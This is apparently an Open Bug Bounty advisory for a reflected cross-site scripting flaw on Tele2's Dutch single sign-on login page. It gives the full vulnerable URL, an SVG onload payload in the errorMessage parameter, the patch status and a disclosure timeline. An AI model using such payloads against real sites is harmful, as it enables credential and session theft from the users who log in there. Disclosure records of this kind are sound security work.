sso.tele2.nl XSS vulnerability

2017-01-06T15:37:00
ID OBB:203634
Type openbugbounty
Reporter Spam404
Modified 2017-07-04T23:44:00

Description

Vulnerable URL:
https://sso.tele2.nl/is-authenticationendpoint/login.do?RelayState=%7BRetriedLogin%3Atrue%7D&SAMLRequest;=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48c2FtbDJwOkF1dGhuUmVxdWVzdCB4bWxuczpzYW1sMnA9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDpwcm90b2NvbCIgRGVzdGluYXRpb249Imh0dHBzOi8vc3NvLnRlbGUyLm5sL2lzLXNhbWxzc28iIEZvcmNlQXV0aG49ImZhbHNlIiBJRD0iZDZhYThkNjItMzQzYS00NTVmLTkxMTAtMGNiM2FjY2VmZjEwIiBJc1Bhc3NpdmU9ImZhbHNlIiBJc3N1ZUluc3RhbnQ9IjIwMTYtMTItMjlUMDI6MDU6MzYuOTYzWiIgUHJvdG9jb2xCaW5kaW5nPSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoyLjA6YmluZGluZ3M6SFRUUC1QT1NUIiBWZXJzaW9uPSIyLjAiPjxzYW1sMjpJc3N1ZXIgeG1sbnM6c2FtbDI9InVybjpvYXNpczpuYW1lczp0YzpTQU1MOjIuMDphc3NlcnRpb24iPk15VGVsZTI8L3NhbWwyOklzc3Vlcj48c2FtbDJwOk5hbWVJRFBvbGljeSBBbGxvd0NyZWF0ZT0idHJ1ZSIgRm9ybWF0PSJ1cm46b2FzaXM6bmFtZXM6dGM6U0FNTDoxLjE6bmFtZWlkLWZvcm1hdDp1bnNwZWNpZmllZCIgU1BOYW1lUXVhbGlmaWVyPSJJc3N1ZXIiLz48L3NhbWwycDpBdXRoblJlcXVlc3Q%2B&commonAuthCallerPath;=%252Fsamlsso&forceAuth;=false&passiveAuth;=false&relyingParty;=MyTele2&tenantDomain;=consumer.tele2.nl&type;=samlsso&sessionDataKey;=3bec3fe7-1484-4e67-8192-1b09b1581574&relyingParty;=MyTele2&type;=samlsso&sp;=MyTele2&isSaaSApp;=false&authenticators;=BasicAuthenticator:LOCAL&errorMessage;=%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E
Details:

Description| Value
---|---
Patched:| Yes, at 04.07.2017
Latest check for patch:| 04.07.2017 09:27 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
VIP website status:| No
Check sso.tele2.nl SSL connection:| (Grade: A-)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 6 January, 2017 15:37 GMT
Generic security notifications sent to website owner| 6 January, 2017 15:40 GMT
Notification sent to subscribers (without technical details)| 6 January, 2017 18:17 GMT
Vulnerability details disclosed by researcher| 31 March, 2017 16:16 GMT
Vulnerability patched by the website owner| 4 July, 2017 23:44 GMT